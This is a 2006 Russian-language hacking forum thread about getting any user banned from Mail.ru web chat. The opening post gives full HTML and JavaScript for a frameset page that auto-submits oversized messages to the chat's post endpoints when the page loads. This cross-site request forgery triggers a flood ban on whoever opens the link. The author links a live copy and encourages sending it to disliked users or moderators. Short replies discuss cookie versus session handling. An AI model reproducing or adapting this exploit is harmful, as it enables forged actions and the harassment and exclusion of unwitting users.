бан любого на ЧАТ@МАИЛ.СРУ
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
бан любого на ЧАТ@МАИЛ.СРУ - 2006-12-11 08:57:02
|
|
|
IVIidNight
Сообщений: 2
Оценки: 0
Присоединился: 2006-12-06 15:51:18.280000
|
Кароче..на чате маил.сру максимальная длина отправляемого в чат сообщения составляет 300 символов…. смотрите в файле keyboard(это самый нижний в чате фрейм) строку: document.write('<input type="text" name="message" maxlength="300" style="width:'+size+'px" size="80" value="">'); вот если отправить в чат сообщение длиной более 300,скажем например 3000 символом,то сервер маил.сру посчитает это за флуд(превышение длины сообщения) и закроет вам доступ в комнату по мылу(не по ИП,как могут модеры). Под другим мылом можно будет зайти в эту комнату. Работает даже на модерах :) ….. модератору был закрыт доступ в комнату за флуд :))))) …. сработает наверно и на создателе комнаты…еще не пробовал. Ну так вот….сейчас на чате есть 1.chat.mail.ru и 2.chat.mail.ru…. заливаем на сайтег файл с 4(!!!) можно и больше фреймами…а в каждый фреймовый файл делаем отправку сообщений в чат…… ===ПРИМЕР ФАЙЛА INDEX.HTM=== <html> <head> <title>Start page</title> <meta http-equiv="Содержимое-Тип" content="text/html; charset=windows-1251"> </head> <frameset rows="*,*" cols="*,*" frameborder="NO" border="1" framespacing="0"> <frame name="cornerFrame" src="2.htm" > <frame name="topFrame" src="1.htm" > <frame name="leftFrame" src="3.htm" > <frame name="mainFrame" src="4.htm"> </frameset> <noframes> <body bgcolor="#FFFFFF" text="#000000"> </body> </noframes> </html> =============================== =======ПРИМЕР 1 ФРЕЙМА============ <html> <head> <meta http-equiv="Content-type" content="text/html; charset=windows-1251"> <link href="http://img.mail.ru/r/chat/port.css" rel=stylesheet type="text/css"> <script> <!– if ( navigator.appName == 'Netscape') { window.captureEvents(Event.KEYPRESS); window.onkeypress = pressed; } function pressed(e) { if( e.which==13 ) send(); } var stopImageString = "http://img.mail.ru/r/chat/stop.gif" var playImageString = "http://img.mail.ru/r/chat/play.gif"; var imgStop = new Image(); var imgPlay = new Image(); var sendProcess = 0; var sendProcessTimer = 0; imgStop.src = stopImageString; imgPlay.src = playImageString; function clear_sendProcess() { sendProcess = 0; if ( sendProcessTimer ) clearTimeout(sendProcessTimer); //document.getElementById("sendbtn").src = "http://img.mail.ru/r/chat/post.gif"; } function set_sendProcess() { //document.getElementById("sendbtn").src = "http://img.mail.ru/r/chat/delete.gif"; sendProcess = 1; sendProcessTimer = setTimeout(clear_sendProcess, 10000); } function send() { var ff = document.forms['kbd_form']; var fo = document.forms['kbd_out']; if ( sendProcess ) return false; if ( ff.message.value == "") return false; fo.to.value = ff.to.value; fo.message.value = ff.message.value; fo.submit(); set_sendProcess(); cls(); return false; } function load() { top.startclock(); clms(); setfocus(); } function unload() { top.closeChild(); top.stopclock(); } function cls() { var ff = document.forms['kbd_form']; ff.message.value = ""; ff.message.focus(); } function clms() { var ff = document.forms['kbd_form']; ff.to.value = ""; ff.message.value = ""; ff.message.focus(); } function setfocus() { var ff = document.forms['kbd_form']; ff.message.focus(); ff.message.select(); } function away() { if( document.getElementById('stop').src == stopImageString ) { document.getElementById('stop').src = playImageString; document.getElementById('stop').alt = "Wakeup"; var fo = document.forms['kbd_away']; fo.away.value = "1"; fo.submit(); setfocus(); } else { document.getElementById('stop').src = stopImageString; document.getElementById('stop').alt = "Away"; var fo = document.forms['kbd_away']; fo.away.value = "0"; fo.submit(); setfocus(); } } function ab() { if( document.getElementById('stop') ) { document.getElementById('stop').src = playImageString; document.getElementById('stop').alt = "Wakeup"; } if( top.setclock ) top.setclock(); } function as() { if( document.getElementById('stop') ) { document.getElementById('stop').src = stopImageString; document.getElementById('stop').alt = "Away"; } if( top.setclock ) top.setclock(); } function quit() { top.closeChild(); var fo = document.forms['kbd_exit']; fo.submit(); } // –> </script> </head> <body text=black bgcolor=#000000 link=#2C5D92 vlink=#2C5D92 alink=#2C5D92 marginwidth=0 marginheight=0 topmargin=0 leftmargin=0 onLoad="send()" onUnLoad="unload()"> <table width=100% height=100% cellpadding=0 cellspacing=2 border=0> <form action="/cgi-xml/post" name="kbd_form" target="kbd_1" onSubmit="return send()"> <tr valign=middle> <td> </td> <td class=novost><input type=text name=to size=7 onFocus="setfocus()" readonly></td> <td width=90% class=novost><script> <!– var size = document.body.clientWidth-1230; document.write('<input type="text" name="message" maxlength="3000" style="width:'+size+'px" size="0" value="Итак. Мне достаточно часто приходилось видеть в обзорах уязвимостей об атаке, названной SQL-инъекцией. Такой тип атак уже достаточно широко известен, но я всё таки опишу, что же он из себя представляет. Многим сценариям(далее скриптам) приходится общаться с базой данных, выбирая оттуда какую-либо информацию, либо сохраняя её. А общаться ему приходится с помощью структурированнаго языка запросов(Structured Query Language или просто SQL), т.к. именно он зарекомендовал себя как простой и эффективный язык запросов к базам данных. Выбирает информацию из базы скрипт чаще всего либо для проверки с какими-либо значениями, либо для вывода этой информации пользователю. Теперь представим, что пользователь должен ввести значение в поле ввода, а скрипт должен найти, скажем, показать пользователю имя и страну участника под тем номером, который ввёл пользователь. Но если то, что ввёл пользователь никак не проверяется перед SQL-запросом, то пользователь может ввести в поле ввода апостроф, что приведёт к неправильному запросу, т.к. апостроф в языке SQL служит ограничителем данных(например символьных). Поясню на примере: пользователь ввёл 13, запрос выглядит так Итак. Мне достаточно часто приходилось видеть в обзорах уязвимостей об атаке, названной SQL-инъекцией. Такой тип атак уже достаточно широко известен, но я всё таки опишу, что же он из себя представляет. Многим сценариям(далее скриптам) приходится общаться с базой данных, выбирая оттуда какую-либо информацию, либо сохраняя её. А общаться ему приходится с помощью структурированнаго языка запросов(Structured Query Language или просто SQL), т.к. именно он зарекомендовал себя как простой и эффективный язык запросов к базам данных. Выбирает информацию из базы скрипт чаще всего либо для проверки с какими-либо значениями, либо для вывода этой информации пользователю. Теперь представим, что пользователь должен ввести значение в поле ввода, а скрипт должен найти, скажем, показать пользователю имя и страну участника под тем номером, который ввёл пользователь. Но если то, что ввёл пользователь никак не проверяется перед SQL-запросом, то пользователь может ввести в поле ввода апостроф, что приведёт к неправильному запросу, т.к. апостроф в языке SQL служит ограничителем данных(например символьных). Поясню на примере: пользователь ввёл 13, запрос выглядит так">'); //–> </script></td> <td><input id=sendbtn type=image src="http://img.mail.ru/r/chat/post.gif" width=5 height=2 border=0 vspace=0 onmousemove="window.status='Отправить'"></td> <td><a href="javascript:clms();"><img src="http://img.mail.ru/r/chat/delete.gif" width=1 height=2 border=0 vspace=0 onmousemove="window.status='Стереть'"></a></td> <script> <!– if( top.getChild ) { document.write('<td><a href="javascript:away();"><img id=stop width=2 height=2 border=0 vspace=0 onmousemove="window.status=\'Away/Wakeup\'"></a></td>'); document.getElementById('stop').src = stopImageString; document.getElementById('stop').alt = "Away"; } //–> </script> <td><a href="javascript:quit()"><img src="http://img.mail.ru/r/chat/exit.gif" width=1 height=1 border=0 vspace=0 onmousemove="window.status='Выход'"></a></td> <td> </td> </tr> </form> <form name="kbd_out" action="http://2.chat.mail.ru/cgi-xml/post" target="kbd_1" method=post> <input type=hidden name=to value=""> <input type=hidden name=message value=""> </form> <form name="kbd_enter" action="/cgi-xml/enter" target="_top" method=post> <input type=hidden name=room value=""> <input type=hidden name=nick value=""> </form> <form name="kbd_ignore" action="/cgi-xml/ignore" target="kbd_1"> <input type="hidden" name="nick" value="" > <input type="hidden" name="ignore"> </form> <form name="kbd_kick" action="/cgi-xml/kick" target="kbd_1"> <input type="hidden" name="nick" value=""> </form> <form name="kbd_away" action="/cgi-xml/away" target="kbd_1"> <input type="hidden" name="away"> </form> <form name="kbd_exit" action="/cgi-xml/exit" target="kbd_1"> <input type="hidden" name="exit"> </form> <form name="kbd_subscribe" action="http://my.chat.mail.ru/cgi-bin/invite" target="kbd_1"> <input type="hidden" name="channelid" value=""> <input type="hidden" name="subscribe" value=""> </form> </table> </body> </html> ======================================== <body text=black bgcolor=#000000 link=#2C5D92 vlink=#2C5D92 alink=#2C5D92 marginwidth=0 marginheight=0 topmargin=0 leftmargin=0 onLoad="send()" onUnLoad="unload()"> обратите внимание на то что при загрузке странички сразу отправляется сообщение===> onLoad="send()" в других фреймах измените в строке <form name="kbd_out" action="http://2.chat.mail.ru/cgi-xml/post" target="kbd_1" method=post> http://2.chat.mail.ru/cgi-xml/post на http://1.chat.mail.ru/cgi-xml/post и так далее :) итак…впариваем злой линк непонравившемуся юзверю или модеру(создателю) и он получает бан:))) пример…вернее уже готовый бан можете посмотреть на сайте… http://softvare2006.narod.ru , кстати я им щас пользуюсь…. попробуйте..вам понравится…. зайдите в чат и в новом окне интернет эксплорера откройте этот линк :) **************************************************************************************** ВНИМАНИЕ!!! РАБОТАЕТ ТОЧНО В ИНТЕРНЕТ ЭКСПЛОРЕРЕ (в других не проверял), В НОВОМ ОКНЕ…ЮЗЕР ДОЛЖЕН БЫТЬ В ЧАТЕ И ОТКРЫТЬ В НОВОМ ОКНЕ ЭТОТ ЛИНК….. **************************************************************************************** ….ЗЫ: объяснять ничо не буду… вопросы не задавать. Если есть соображения,по этому поводу,буду рад обсудить….
|
|
|
RE: бан любого на ЧАТ@МАИЛ.СРУ - 2006-12-11 22:51:13.953333
|
|
|
Diabolus
Сообщений: 127
Оценки: 0
Присоединился: 2006-11-18 05:35:27.343333
|
хехе :) поиск дырок в веб-чатах.. ностальгия :) ну а вообще странно, что там авторизация через куки (если я правильно понял)… в веб-чате, имхо, самое то юзать сессии - и защита от подобных описанной баг, и более рационально :)
|
|
|
RE: бан любого на ЧАТ@МАИЛ.СРУ - 2006-12-12 09:25:55.826666
|
|
|
IVIidNight
Сообщений: 2
Оценки: 0
Присоединился: 2006-12-06 15:51:18.280000
|
да… кукисы там конечно есть, но этот способ сработает только в пределах сессии…. т.е. допустим сессия поддерживаемая в чате в осле… 100% работает :)
|
|
|
RE: бан любого на ЧАТ@МАИЛ.СРУ - 2006-12-13 01:57:02.736666
|
|
|
Diabolus
Сообщений: 127
Оценки: 0
Присоединился: 2006-11-18 05:35:27.343333
|
а блин ) я-то уж решил, что там мона и с нарушением сессии ) гы )
|
|
|
|
|